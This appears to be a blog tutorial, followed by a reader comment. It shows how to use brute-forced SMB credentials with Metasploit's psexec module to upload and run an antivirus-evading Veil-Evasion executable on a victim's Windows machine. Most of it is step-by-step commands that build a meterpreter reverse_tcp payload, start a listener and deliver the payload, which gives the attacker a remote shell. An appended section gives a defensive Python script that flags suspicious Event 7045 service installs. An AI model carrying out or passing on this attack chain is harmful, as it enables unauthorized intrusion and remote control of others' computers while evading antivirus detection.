The last post explained how to find Windows share (SMB) credentials by brute force.
In today's tutorial we are going to upload and execute an undetectable payload on the victim's machine using the SMB credentials obtained by brute force.
For that I am going to use the Metasploit module Microsoft Windows Authenticated User Code Execution (exploit/windows/smb/psexec).
This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
The PsExec utility is a command line tool that allows the execution of processes on a remote system and transfers the results of those operations to the local console. It has a long list of optional parameters that give IT administrators a great deal of flexibility. The key feature of PsExec is that it lets users run a script or application in the security context of either the currently logged-on user or a user supplied when the program starts.
For that we need the Veil-Evasion tool to generate payload executables that bypass antivirus. To install Veil-Evasion, follow the previous post, Evading-Antivirus.
After Veil-Evasion is installed, just run the script inside the Veil-Evasion directory:
#./Veil-Evasion.py
After executing the Veil-Evasion.py Python script, the Veil window appears. You can see that today it has 31 payloads.
You can obtain a list of all the payloads with the "list" command:
[>] Please enter a command: list
[>] Please enter a command: use 27
[>] Please enter a command: set use_pyherion Y
PyInjector creates a Python executable with an embedded ASCII payload in it, but it uses standard Windows API calls to put the payload in memory and execute it.
I am going to use the python/b64_substitution payload, so I type "use 27" and press Enter. It loads that component, as shown below:
[>] Please enter a command: generate
After giving the generate command, it is necessary to wait while the shellcode is generated.
Now we are going to select msfvenom by typing "1":
[>] Please enter the number of your choice : 1
After that we need to enter some details:
Enter metasploit payload: “windows/meterpreter/reverse_tcp”
Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”
Enter value for ‘LPORT’: “8080”
Press Enter and Veil asks for the name of our payload. We are going to use Pyinstaller, which will create a setup1.exe installable. For this, we type "1":
[>] Please enter the number of your choice : 1
Next, I issue the "generate" command and press Enter to create the executable.
We need to set up Metasploit to listen for the Meterpreter reverse TCP connection on port 8080:
#msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.31.20
msf exploit(handler) > set LPORT 8080
msf exploit(handler) > exploit -j
msf exploit(handler) > jobs
It will show our current reverse_tcp handler job. Now we are going to use the psexec exploit in msfconsole:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.31.2
msf exploit(psexec) > set SMBPass bhuvi
msf exploit(psexec) > set SMBUser sathish
msf exploit(psexec) > set EXE::Custom /root/veil-output/compiled/setup1.exe
msf exploit(psexec) > set DisablePayloadHandler true
msf exploit(psexec) > exploit
After entering the credentials and setting the path of the undetectable executable in EXE::Custom, the custom exe is uploaded and executed on the victim's machine, and when the victim connects back we get a Meterpreter session to operate.
And our AV still does not find any suspicious activity, but this may vary for other AV vendors.
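A defender's view of the same technique, as an added example that is not part of this post: the psexec module above installs a service with a randomly chosen name, and Windows records every service installation as System log Event 7045. This script scores constructed 7045-style lines and flags the two indicators a responder would look for, a random-looking service name and a service binary dropped straight into the Windows directory (the directory behind the ADMIN$ share). The flattened line format, the mixed-case heuristic and the sample service names are my assumptions, not Metasploit's or Veil's code.

```python
import re

# Constructed sample lines shaped like Windows System log Event 7045
# ("A service was installed in the system"), flattened to one event per line.
SAMPLE_7045 = [
    "EventID=7045 ServiceName=WSearch ImagePath=C:\\Windows\\system32\\SearchIndexer.exe /Embedding",
    "EventID=7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe",
    "EventID=7045 ServiceName=hTyQwRkz ImagePath=%SystemRoot%\\hTyQwRkz.exe",
    "EventID=7045 ServiceName=MyBackupAgent ImagePath=\"C:\\Program Files\\Backup\\agent.exe\"",
]

LINE_RE = re.compile(r"EventID=(?P<id>\d+) ServiceName=(?P<name>\S+) ImagePath=(?P<path>.*)$")

def looks_random(name: str) -> bool:
    """Heuristic (assumption): an alphabetic service name whose letter case
    flips at least half the time, as random mixed-case generators produce."""
    if not name.isalpha() or len(name) < 6:
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips / (len(name) - 1) >= 0.5

def in_windows_root(path: str) -> bool:
    """True when the binary sits directly in the Windows directory (the
    directory backing the ADMIN$ share), not in a subdirectory such as system32."""
    p = path.strip('"').lower()
    return bool(re.match(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe", p))

def score_event(line: str):
    """Parse one flattened 7045 line and collect the reasons it looks suspicious."""
    m = LINE_RE.match(line)
    if not m or m.group("id") != "7045":
        return None
    name, path = m.group("name"), m.group("path")
    reasons = []
    if name.upper() == "PSEXESVC":
        reasons.append("default Sysinternals PsExec service name")
    if looks_random(name):
        reasons.append("random-looking service name")
    if in_windows_root(path):
        reasons.append("service binary dropped directly into the Windows directory")
    return {"service": name, "path": path, "reasons": reasons}

def suspicious_services(lines):
    """Return (service name, reasons) for every 7045 event with at least one hit."""
    out = []
    for line in lines:
        ev = score_event(line)
        if ev and ev["reasons"]:
            out.append((ev["service"], ev["reasons"]))
    return out

if __name__ == "__main__":
    for name, why in suspicious_services(SAMPLE_7045):
        print(f"{name}: {', '.join(why)}")
```

Only the two service installations matching the psexec pattern are reported; the legitimate WSearch and MyBackupAgent entries produce no hits.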
Hi Sathish! Thanks to you for this wonderful site and your work. I'm a fan of your site and if possible please write more articles. 🙂 Can you please tell me the sequence using Veil-Catapult and Veil-Evasion? I am somehow confused. ))) Thanks in advance!